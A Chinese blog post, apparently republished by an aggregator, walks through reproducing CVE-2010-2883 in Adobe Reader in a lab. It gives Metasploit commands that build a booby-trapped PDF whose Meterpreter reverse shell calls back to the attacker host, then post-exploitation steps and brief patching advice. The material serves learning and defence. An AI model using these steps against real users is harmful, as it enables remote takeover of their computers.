[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf即刻中招
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf即刻中招相关的知识,希望对你有一定的参考价值。
1、漏洞概述
在“漏洞界”,据称有两种大山是其他软件永远无法匹敌的,一个是Microsoft的Office套件,一个是Adobe的全家桶。这两家出的漏洞,无论在出洞频率、攻击危害性、或者是影响范围等多个维度来看,都直接将其他软件远远甩开。如果要较真起来,到底谁是“漏洞之王”?
相信Adobe一定能“摘得桂冠”。
Adobe全家桶里面的Adobe Flash Player、Adobe Reader、Adobe Acrobat等产品,可以说是“难兄难弟”了,每年都会贡献一大堆漏洞。很多人就会问,为什么就他们家的产品漏洞最多,别人家的呢?
其实,所有软件都或多或少有漏洞,没有绝对安全的软件,就看有没有人去挖掘而已。
Adobe系列因为桌面安装量非常庞大,而且官方似乎安全开发工作这块做的不是太好,大量的黑客或安全研究人员愿意投入更多的时间来“挖洞”,一个成熟可利用的Adobe 0day漏洞,价值连城毫不夸张。
这不,2018年2月份,Adobe Flash最新版就爆出CVE-2018-4878 高危漏洞,可导致电脑直接被getshell。而同一月份,思科旗下安全团队TALOS披露了Adobe Reader最新版存在远程代码执行漏洞(CVE-2018-4901),简单来说,“打开PDF文件可能导致被getshell”。目前,Adobe已经发布了针对此漏洞的安全补丁。
由于Adobe Reader CVE-2018-4901 暂时还没有成熟可用的渗透代码流传出来,所以目前并没有像Adobe Flash CVE-2018-4878 引起更广泛的关注。
但是,我们要注意一点的是,此时此刻,必定有很多黑客正在尝试写攻击代码,准备发起新一轮攻击。
虽然我们没法直接对最新CVE-2018-4901进行复现,但从学习的角度,可以拿一个非常经典的老漏洞 CVE-2010-2883 来进行实践。这枚漏洞年限已久,但可以直接做出“打开pdf即刻中招”的效果,可以说是“简单暴力”的典范了。
CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。”
影响版本:Adobe Reader 8.2.4 - 9.3.4
目前,Kali Linux Metasploit已经集成了相关的漏洞利用代码,我们可以用较快的速度,对此漏洞进行复现。
2、漏洞复现环境
Kali Linux + Windows 7 sp1
渗透机:Kali Linux (ip:172.16.70.216)
靶机:Windows 7 sp1 (ip:172.16.70.199)
软件:Adobe Reader 9.3.exe
注:此实验环境所用渗透机和靶机,跟之前文章所分享一致。为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘=>
链接: https://pan.baidu.com/s/1585jIDZgRh7IzwE01dK-Bw 密码:ie8m
3、实验流程
①进入Kali Linux,使用Metasploit生成PDF木马文件
搜索Adobe渗透模块 msf > search adobe_cooltype_sing
调用渗透模块 msf > use exploit/windows/fileformat/adobe_cooltype_sing/
查看模块详情 msf exploit(adobe_cooltype_sing) > info
调用meterpreter载荷,反向连接到渗透机 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
设置Kali Linux的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216
设置本地监听端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888
设置带有后门程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf
执行渗透生成文件 msf exploit(adobe_cooltype_sing) > exploit
②将PDF木马文件拷贝至Kali Linux桌面
[email protected]:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf
③Metasploit开启shell监听会话,等待肉鸡上线
使用handler监听模块 msf > use exploit/multi/handler
回弹一个tcp连接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
设置监听IP地址(跟PDF木马文件一致) msf exploit(handler) > set LHOST 172.16.70.216
设置监听的端口(跟PDF木马文件一致) msf exploit(handler) > set LPORT 8888
开启监听 msf exploit(handler) > exploit
④在Windows 7安装Adobe Reader 9.3
⑤将PDF木马文件拷贝到Windows 7并打开
⑥Metasploit获取shell会话,并用Meterpreter控制肉鸡
查看系统信息 meterpreter > sysinfo
查看当前用户 meterpreter > getuid
截屏 meterpreter > screenshot
获取进程 meterpreter > ps
切换进程(考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,所以需要快速切换到其他系统进程,这样会话才不会失效)
meterpreter > migrate 3748
获取Dos Shell meterpreter > shell
C:\Windows\system32>ipconfig
实验总结:
可以看到,最终由于Adobe Reader 存在CVE-2010-2883这个高危漏洞,导致电脑打开特殊定制的pdf之后,直接变成肉鸡。与之前文章中的Office和Flash 0day漏洞类似,真实环境下,很多黑客会利用此方法,结合社会工程学,例如通过诱导邮件、各种论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。
在这里也呼吁大家:平常要非常小心陌生办公文件,无论是pdf还是word等,打开之前一定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽量保证电脑的软件处于最新版,这样才能最大程度降低被攻击的几率。
4、漏洞修复
①直接到Adobe官网,下载Adobe Reader最新版本;
②安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。
相关推文:
[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell
[漏洞复现] CVE-2017-11882 通杀所有Office版本
[漏洞复现] CVE-2017-16995 Ubuntu16.04
以上是关于[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf即刻中招的主要内容,如果未能解决你的问题,请参考以下文章
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告